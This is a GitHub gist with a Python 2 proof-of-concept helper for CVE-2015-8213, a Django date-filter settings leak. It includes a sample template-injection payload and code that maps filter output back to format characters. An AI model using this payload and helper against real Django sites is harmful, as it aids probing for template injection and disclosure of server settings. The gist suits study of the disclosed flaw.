Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
#!/usr/bin/env python
# coding: utf8
# author: evi1m0 & 2d
'''
vul:
- CVE-2015-8213: Settings leak possibility in date template filter
e.g:
- time: 2015-10-26 05:54:22
- test: {{ time_var.add_time | date:"
a|||b|||c|||d|||e|||f|||g|||h|||i|||j|||k|||l|||m|||n|||o
|||p|||q|||r|||s|||t|||u|||v|||w|||x|||y|||z|||A|||b|||C
|||D|||E|||F|||G|||H|||I|||J|||K|||L|||M|||N|||O|||P|||
Q|||R|||S|||T|||U|||V|||W|||X|||Y|||Z"
}}
- res :
a.m.|||oct|||2015-10-26T05:54:22.944790+00:00|||26|||UTC|||5:54
|||5|||05|||54|||26|||k|||Monday|||10|||10|||2015|||p|||q|||
Mon,26 Oct 2015 05:54:22 +0000|||22|||31|||944790|||v|||1|||x|||
15|||299|||AM|||oct|||C|||Mon|||October|||October|||5|||05|||0
|||J|||K|||False|||Oct|||Oct.|||+0000|||5:54 a.m.|||Q|||R|||th|||
UTC|||1445838862|||V|||44|||X|||2015|||0
- usage :
python convert_relation.py '26UTC5:54a.m.944790Monday31'
'a.m.|||oct|||2015-10-26T05:54:22.944790+00:00|||26|||UTC|||5:54
|||5|||05|||54|||26|||k|||Monday|||10|||10|||2015|||p|||q|||Mon,
26 Oct 2015 05:54:22 +0000|||22|||31|||944790|||v|||1|||x|||15
|||299|||AM|||oct|||C|||Mon|||October|||October|||5|||05|||0|||
J|||K|||False|||Oct|||Oct.|||+0000|||5:54 a.m.|||Q|||R|||th|||
UTC|||1445838862|||V|||44|||X|||2015|||0'
'''
import re
import sys
import json
from copy import deepcopy
from pprint import pprint
test = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
def convert(ires):
ssss = {}
ires_split = ires.split('|||')
for i, k in enumerate(ires_split):
l = ssss.get(k, [])
if not l:
ssss[k] = []
if test[i] not in l:
ssss[k].append(test[i])
return ssss
def test_res(ssss, encry_str):
res_dict = {}
encry_str_cpy = encry_str
for k in sorted(ssss.iterkeys(), key=lambda i:len(i), reverse=True):
flag = False
for m in re.finditer(re.escape(k), encry_str_cpy):
res_dict[m.start()] = ssss[k]
flag = True
if flag:
encry_str_cpy = encry_str_cpy.replace(k, len(k)*'\x00')
for i, c in enumerate(encry_str_cpy):
if c != '\x00':
res_dict[i] = [c]
res_list = []
for k, v in sorted(res_dict.iteritems(), key=lambda i:i[0], reverse=False):
res_list.append(v)
return res_list
if __name__ == '__main__':
if len(sys.argv) < 3:
print '[-] Usage: script.py time res_str'
sys.exit()
# encryption_str = "26UTC5:54a.m.944790Monday31"
encryption_str, ires = sys.argv[1], sys.argv[2]
print '[*] Vulner: CVE-2015-8213'
print '[*] Author: Evi1m0 & 2d\n'
print '[+] Encryption_str: %s' % encryption_str
ssss = convert(ires)
results = test_res(ssss, encryption_str)
print '[+] Results:\n'
pprint(results)
print '\n[+] The results of the intelligent analysis may be:\n'
for i in results:
print i[0],
print
for i in results:
try:
print i[1],
except Exception, e:
print i[0],

CVE-2015-8213.py
这是什么呀?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment